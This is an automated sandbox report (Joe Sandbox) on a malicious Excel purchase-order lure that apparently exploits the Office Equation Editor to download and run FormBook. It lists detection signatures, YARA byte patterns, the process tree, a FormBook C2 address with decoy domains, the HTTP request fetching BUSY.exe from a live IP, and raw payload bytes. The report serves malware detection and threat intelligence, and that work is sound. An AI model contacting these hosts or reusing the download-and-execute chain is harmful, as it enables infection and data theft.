Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Sample Name:PO 65738963578 Revise Settlement.xlsx
Analysis ID:626146
MD5:e5c9c992c088a778a6348f4a58dd78d3
SHA1:754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256:6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
Tags:VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1980 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2576 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2372 cmdline: "C:\Users\Public\vbc.exe" MD5: 029BBE98A216416EB698CA543A5C0830)
      • idcqz.exe (PID: 2428 cmdline: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab MD5: 51F62DEF6DC686B87CC0BAFC31685546)
        • idcqz.exe (PID: 2544 cmdline: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab MD5: 51F62DEF6DC686B87CC0BAFC31685546)
  • cleanup
{"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    SourceRuleDescriptionAuthorStrings
    2.2.EQNEDT32.EXE.931118.0.raw.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
    • 0x16e8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x16e8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
    2.3.EQNEDT32.EXE.931118.1.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
    • 0xae8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0xae8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
    2.3.EQNEDT32.EXE.931118.1.raw.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
    • 0x16e8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x16e8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
    5.2.idcqz.exe.160000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
      5.2.idcqz.exe.160000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 5 entries

      Exploits

      barindex
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.81.20, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2576, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2576, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}
      Source: PO 65738963578 Revise Settlement.xlsxVirustotal: Detection: 41%Perma Link
      Source: PO 65738963578 Revise Settlement.xlsxReversingLabs: Detection: 29%
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: www.cortesdisenosroutercnc.com/itq4/Avira URL Cloud: Label: malware
      Source: http://198.12.81.20/busy/BUSY.exeC:Avira URL Cloud: Label: malware
      Source: http://198.12.81.20/busy/BUSY.exeiiC:Avira URL Cloud: Label: malware
      Source: http://198.12.81.20/busy/BUSY.exejAvira URL Cloud: Label: malware
      Source: http://198.12.81.20/busy/BUSY.exeAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exeJoe Sandbox ML: detected
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: 2.3.EQNEDT32.EXE.998472.2.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 2.3.EQNEDT32.EXE.931118.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 2.3.EQNEDT32.EXE.998472.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 2.2.EQNEDT32.EXE.931118.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 5.2.idcqz.exe.160000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

      Exploits

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.12.81.20 Port: 80Jump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B

      Software Vulnerabilities

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0379043F ShellExecuteW,ExitProcess,2_2_0379043F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_037903A2
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03790411 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03790411
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_037902FD ExitProcess,2_2_037902FD
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_037903BC URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_037903BC
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03790332 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03790332
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0379042A ShellExecuteW,ExitProcess,2_2_0379042A
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03790464 ExitProcess,2_2_03790464
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03790316 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03790316
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

      Networking

      barindex
      Source: Malware configuration extractorURLs: www.cortesdisenosroutercnc.com/itq4/
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewIP Address: 198.12.81.20 198.12.81.20
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:42:02 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17Last-Modified: Fri, 13 May 2022 11:21:13 GMTETag: "3e719-5dee2df4306a6"Accept-Ranges: bytesContent-Length: 255769Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_037903A2
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.20
      Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.20/busy/BUSY.exe
      Source: EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.20/busy/BUSY.exeC:
      Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.20/busy/BUSY.exeiiC:
      Source: EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.20/busy/BUSY.exej
      Source: EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emfJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_037903A2
      Source: global trafficHTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040580F

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
